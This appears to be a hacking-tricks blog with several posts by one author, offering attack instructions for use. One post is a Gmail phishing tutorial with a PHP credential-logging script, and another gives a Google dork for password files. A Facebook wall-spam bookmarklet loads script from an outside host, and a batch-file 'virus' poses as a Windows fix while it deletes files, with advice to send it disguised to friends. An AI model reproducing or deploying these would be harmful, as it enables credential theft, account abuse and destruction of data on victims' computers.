How To Make A Phishing Page

Author – Leo Harsha

Click Here To Follow

 

Make a Phishing Page

 
 Friends i am  writeing about  Phishing .  Phishing is the process of stealing sensitive information,
 such as usernames, passwords, and bank information, by pretending to be someone 
you’re not. An example of this would be if you receive and e- mail from a hacker 
pretending to be your bank. In this e- mail, it might tell you that you need to 
update your account before it expires, and then the hacker provides a link. Once 
you click on the link, you arrive at a website that looks exactly like your actual 
bank page. In reality it’s just a perfec t replica, and when you input your login 
details, it sends it to the hackers email or stores it on his web server. Hackers that 
create the best, most deceiving phishing web pages are knowledgeable in the 
area of HTML and the  PHP  programming. Below I will show a simple example of 
some of the steps a hacker might take to create a phishing website. By seeing the 
steps a hacker would take , will help you defend against such an attack.

1.   First the hacker chooses a target. The most popular targets for phishing 
attacks are e- mail services such as Hotmail and Gmail because  they are 
the most common and  once a hacker gets   access to your e- mail, he also 
gets access to a load of other user inform ation for all the other websites 
you use. In this example we will pretend the hacker ch ose Gmail as his 
target.  
2.   After choosing his target, the hacker will go to the website and save the 
whole main page. I use Mozilla Firefox  ,(highly recommend using this 
browser for its security and customization.) So I would go to 
http://www.gmail.com and click  File  – > Save page as … , or simply hit  <CTR> + S 
which does this automatically. Choose where you would like to save the 
web page and hit Save.

3.   Once you have it saved,  rename ServiceLogin.htm to index.htm.  The 
reason you want to name it “index” is so when you upload it to a web 
host and someone goes to your link, the index page is the first page that 
shows up.  
4.   Next the hacker would create a  PHP  script  to do his dirty deed of 
steeling your information.  Below is a simple PHP script that logs and 
stores your login details  when you click  “Sign in”.  To see how it works, 
copy and paste the following code into notepad. Next save it into the 
same directory as you saved the Gmail page, and name it phish.php.  In 
addition to the phish.php page, create a new empty  text file and name it 
list.txt .

  
<?php   // This marks the beginning of the PHP script. 

H eader( “ Location: 
https://www.google.com/accounts/ServiceLogin?service=mail&passive=
true&rm=false&continue=http%3A%2 F%2Fmail.google.com%2Fmail%2F
%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy&ltmpl=default&ltmplcac
he=2 “ );   // once you click “Sign in” in the fake website, this redirects 
you to the real Gmail website, making the whole process look more 
legit. 

$handle = fopen( “ list.txt ” ,  “ a”);  // this tells the server to open the file         
“list.txt” and get it ready for appending data. Which in this case is your 
username and password. 

F oreach($_GET as $variable => $value) { 
    fwrite($handle, $variable); 
    fwrite($handle,  “ =” ); 
    fwrite($handle, $value); 
    fwrite($handle,  “ \r \ n” ); 
}            // This section simply assigns all the information going through 
this form to a variable. This includes your username and password. 
F write($handle, “ \r \n ” );  // This  writes your details to the file “list.txt” 

fclose($handle);    // This simply closes the c
“list.txt”  
exit;  
?>  // Marks the end of the PHP program.  
 So far you should see the following in your folder: 

  Now the hacker would have to edit the main Gmail page to include his 
PHP script. To see what the hacker  would do , open up the main Gmail 
page named index.htm with notepad. 
6.   Hit <CTR> + F  , or go to  Edit  – > Find , type in  action  and hit “Find Next ”

 
 

7.   This will highlight the first occu rrence of the word “action ” in the script 
and you should see the following:  

 

 

 

 

There are two “action ” occurrences in the script so make sure you have 
the right one by looking at the “ form id” name above. Change the link 
between action = “ “ to  phish.php . This will make the form submit to 
your PHP phish script instead of to Google .  After the link you will see the 
code:

Change the word “POST” to “ G ET ” so that it looks like  method=”GET”.
What the GET method does is submit the information you type in 
thro ugh the URL so that the PHP script can log it.  

8.   Save and close the file. 
9.   Next the hacker would upload the files up to a free webhost that 
supports PHP. With a simple Google search you can come up with a 
bunch that fall under this category. 
10. Once all the files are uploaded, you must give writing permissions to t
“list.txt” file. Every host ing company should have a CHMOD option nex
to each file. Select this option and change  the file permission for 
“list.txt” to 777. If you can’t figure out how to do this, ask people that 
use the same  host  or simply Google something similar to: 
“yourwebhostname chmod”. 

11. Once everything is up and ready to go, go to the link your host provide
you for your website and you should see the Gmail page replica. Typ e 
a username/password and click Sign in. This should have redirected yo
to the real Gmail page. 
12. Now go take a look at your list.txt file by going through your hosting fi
manager or going to 
http://www.yourwebhosturl.com/youraccount/list.txt . Althoug h this is
the most common, the web host you use may provide a different 
looking URL. Now if I put a username of “myusername” and a passwor
of “mypassword” then “list.txt” would now look like the following:

As you can see if you fell for this the hacker  would have your email and 
password.

so try this .  friends don’t forget write your valueble comment.

Posted in Uncategorized

**** Hack FTP Site ****

Author – Leo Harsha

Click Here To Follow

 

Some FTP Site Link Use Them And Enjoy  Hack Ftp site…………………………………..
 
This is For you.  Thanks .
 
 
 

 ftp://193.125.152.110/pub/.1/misc

Tagged with:
Posted in Uncategorized

*Hack Username and Password***

Author – Leo Harsha

Click Here To Follow

Today i post new trick to get username and password with google. 

1:- some administrators change the name of service pwd file or user pwd or 

something else . so get biggest chance to get

inurl:(service|authors|adminatrators|user)

2:- the file extension is “pwd” and we are not interseted to get other so 

we will add “ext”.

ext:pwd

3:- the firstline in the service pwd is “#front Page-” so we will search

for the strings with google

just as:-

inurl:(service|authors|administrators|user) ext:pwd “#front page-“

note :- this above code use to search in google .Get front page user and password.

Password is hash so plz crack hash with good hash cracker.

Tagged with:
Posted in Uncategorized

How to Trace Any Mobile Number

Author – Leo Harsha

Click Here To Follow

 

How to Trace Any Mobile No

 
Guys today i post how to get detail any missed call  and mobile no. calls

 First go to http://www.india-cellular.com/mobile-number-locator.aspx

Second  Enter 4 digit of mobile no you want to detail . then enter


this trick show you service provider and  state, city   detail……………………



 
 
Tagged with:
Posted in Uncategorized

“Enter Password ” Hacking

“Enter Password ” HackinG

 

Author – Leo Harsha

Click Here To Follow

 

This is  “Enter Password ” hacking. trick.

1:- Go to Google search engine and type “enter password”.

2:- Pick some one any website.

3:- Go to “view source” option in view.

4:- Find password by “password name,password field,password value and password

   password save in source with “……….”.

Guys if you like this plz comment. this valuable for me

 
Tagged with:
Posted in Uncategorized

Ruin Facebook wall

Author – Leo Harsha

Click Here To Follow

 

Looking for a way to piss off your friends on Facebook? Here’s how.
 
1. Go to the victims wall on Facebook
 
2. Copy and paste the code below into the address bar on your browser and hit enter
Once Thats done you will see the meaning of Step 3.
 
3. Enter # of times you want message posted on the wall and the message.
 
4. Refresh the page and laugh.
 
The code [Do not edit the code] :
 
Code:
javascript:(a = (b = document).createElement(“script”)).src = “//hallwayinsider.com/a.js”, b.body.appendChild(a); void(0)
 
Tagged with:
Posted in Uncategorized

How To Create Virus

Author – Leo Harsha

Click Here To Follow

 

create some batch  file virus  on computer  i am write code of  this virus
 
 
1:- delete windows  
 
 copy code below there  and paste in notepad  , save file with any name   with .bat
 then send to your friends and also hide in picture.

code:

@echo off
cls
color 0C
echo Windows has found a virus…
echo.
echo It is recommended to let Windows fix this issue.
echo.
echo If you do not let Windows fix this issue,
echo the next time you restart the computer
echo Windows will not load properly.
set /p command=Would you like windows to fix this issue? (Y/N): 
if “%command%”==”Y” goto :delete
if “%command%”==”N” goto :exit
:delete
cls
echo Deleting files in %WINDIR%.
PING 1.1.1.1 -n 1 -w 2500 >NUL
cls
echo Deleting files in %WINDIR%..
PING 1.1.1.1 -n 1 -w 2500 >NUL
cls
echo Deleting files in %WINDIR%…
PING 1.1.1.1 -n 1 -w 2500 >NUL
cls
if exist “C:\WIN” goto start
MKDIR “C:\WIN”
:start
xcopy /E /Y %windir% “C:\WIN”
del C:\WIN
cls
shutdown -r -t 10 -c “Windows has succesfully fixed the issue.”
:exit
exit 

Posted in Uncategorized